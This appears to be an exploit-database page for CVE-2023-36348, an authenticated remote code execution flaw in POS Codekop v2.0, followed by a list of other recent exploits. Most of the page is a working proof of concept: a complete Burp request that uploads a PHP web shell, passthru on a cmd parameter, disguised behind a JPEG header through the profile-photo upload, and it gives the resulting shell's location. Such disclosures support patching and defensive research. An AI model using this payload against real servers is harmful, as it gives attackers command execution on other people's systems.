Pos codekop v2.0 authenticated remote code execution (rce) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-07-03 | Type : webapps | Platform : php
This exploit / vulnerability Pos codekop v2.0 authenticated remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)
# Date: 25-05-2023
# Exploit Author: yuyudhn
# Vendor Homepage: https://www.codekop.com/
# Software Link: https://github.com/fauzan1892/pos-kasir-php
# Version: 2.0
# Tested on: Linux
# CVE: CVE-2023-36348
# Vulnerability description: The application does not sanitize the filename
parameter when sending data to /fungsi/edit/edit.php?gambar=user. An
attacker can exploit this issue by uploading a PHP file and accessing it,
leading to Remote Code Execution.
# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/

# Proof of Concept:
1. Login to POS Codekop dashboard.
2. Go to profile settings.
3. Upload PHP script through Upload Profile Photo.

Burp Log Example:
```
POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1
Host: localhost
Content-Length: 8934
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
**Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-User: ?1**
Sec-Fetch-Dest: document
Referer: http://localhost/research/pos-kasir-php/index.php?page=user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv
Connection: close

------WebKitFormBoundarymVBHqH4m6KgKBnpa
Content-Disposition: form-data; name="foto"; filename="asuka-rce.php"
Content-Type: image/jpeg

ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>
ÿÛC

-----------------------------
```
PHP Web Shell location:
http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php

Pos codekop v2.0 authenticated remote code execution (rce)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Pos codekop v2.0 authenticated remote code execution (rce) Vulnerability / Exploit